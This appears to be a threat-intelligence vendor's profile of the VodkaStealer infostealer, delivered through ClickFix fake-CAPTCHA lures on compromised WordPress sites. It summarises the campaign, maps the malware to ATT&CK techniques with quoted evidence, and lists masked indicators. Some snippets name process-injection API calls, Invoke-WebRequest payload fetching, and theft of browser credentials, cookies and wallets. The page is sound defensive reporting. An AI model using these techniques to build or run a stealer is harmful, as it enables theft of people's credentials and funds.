Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
Malware

VodkaStealer

VodkaStealer is a custom C++ information stealer observed as a payload in a large ClickFix campaign that used compromised legitimate WordPress sites to target primarily Windows users. In the reported activity, attackers injected malicious JavaScript into WordPress sites and displayed fake Cloudflare human-verification/CAPTCHA prompts that instructed victims to paste commands into the Windows Run dialog, leading to a multi-stage, largely in-memory infection chain. Rapid7 reported the broader operation had been active in this form since December 2025, with some supporting infrastructure dating to July/August 2025, and identified more than 250 compromised websites across at least 12 countries. VodkaStealer was delivered alongside other payloads including Vidar Stealer, Impure Stealer, and the DoubleDonut loader. The malware family is described as capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data, and other sensitive information from infected devices. Rapid7 specifically described VodkaStealer as the latest payload observed at the end of the DoubleDonut chain. High-confidence associations in the provided content tie VodkaStealer to financially motivated malware distribution via ClickFix/social-engineering lures on compromised WordPress infrastructure; no specific threat actor attribution beyond that is provided.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1189Drive-by CompromiseEvidence4

Highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge.

Execution

2 techniques
T1059Command and Scripting InterpreterEvidence1

Visitors are instructed to complete the verification by copying and pasting a command into the Windows Run dialog box.

T1204User ExecutionEvidence3

Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands.

Privilege Escalation

1 technique
T1055Process InjectionEvidence1

"...execute it utilizing the VirtualAlloc and CreateThread Windows APIs..." and "...injected into a native svchost.exe process..."; "OpenProcess... VirtualAllocEx, WriteProcessMemory and CreateRemoteThread"

Stealth

1 technique
T1055Process InjectionEvidence1

"...execute it utilizing the VirtualAlloc and CreateThread Windows APIs..." and "...injected into a native svchost.exe process..."; "OpenProcess... VirtualAllocEx, WriteProcessMemory and CreateRemoteThread"

Credential Access

4 techniques
T1539Steal Web Session CookieEvidence2

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555Credentials from Password StoresEvidence1

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555.003Credentials from Web BrowsersEvidence1

"...ultimately steals and exfiltrates credentials and digital wallets..."; "...targeting Google Chrome, Microsoft Edge, Brave..."

T1649Steal or Forge Authentication CertificatesEvidence1

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

Collection

1 technique
T1005Data from Local SystemEvidence1

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

Command and Control

3 techniques
T1071.001Web ProtocolsEvidence1

"Invoke-WebRequest" to retrieve payloads; "...fetch a script..."; "...download a shellcode blob..."

T1104Multi-Stage ChannelsEvidence1

"...multi-stage malware chain..."; "...Donut loader is used twice in sequence..."

T1573.001Symmetric CryptographyEvidence1

"...AES-256-CBC with a server-provided key for encryption of C2 communication..."

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

"...steals and exfiltrates credentials and digital wallets..." and ATT&CK table listing "T1041 Exfiltration Over C2 Channel"

INDICATORS OF COMPROMISE

IOCs tracked for this family

55 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
17 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
38 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app21 days ago
ip.v4●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app4 months ago
domain●●●●●●●●●●●●View more in app4 months ago
domain●●●●●●●●●●●●View more in app4 months ago
domain●●●●●●●●●●●●View more in app4 months ago
ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
the hacker newsNews
Mar 16, 2026
ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers

A C++ stealer used as a payload in ClickFix campaigns delivered through compromised WordPress websites.

Read more
bank info securityNews
Mar 12, 2026
Breach Roundup: Russian State Actors Target Signal, WhatsApp

Information-stealing malware used in the described ClickFix campaign to collect browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information.

Read more
govinfosecurityNews
Mar 12, 2026
Breach Roundup: Russian State Actors Target Signal, WhatsApp

Information-stealing malware delivered via ClickFix through compromised WordPress sites; harvests browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information.

Read more
rapid7 blogNews
Mar 9, 2026
When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation

Custom C++ infostealer attributed to the same developer/operator as the DoubleDonut loader; performs RU/BY geofencing, anti-debug/VM checks, browser and wallet data theft, stages data in temp directories, and attempts to use ChromElevator to bypass Chrome App-Bound Encryption (noted as currently broken in the analyzed sample).

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching55

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping13

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.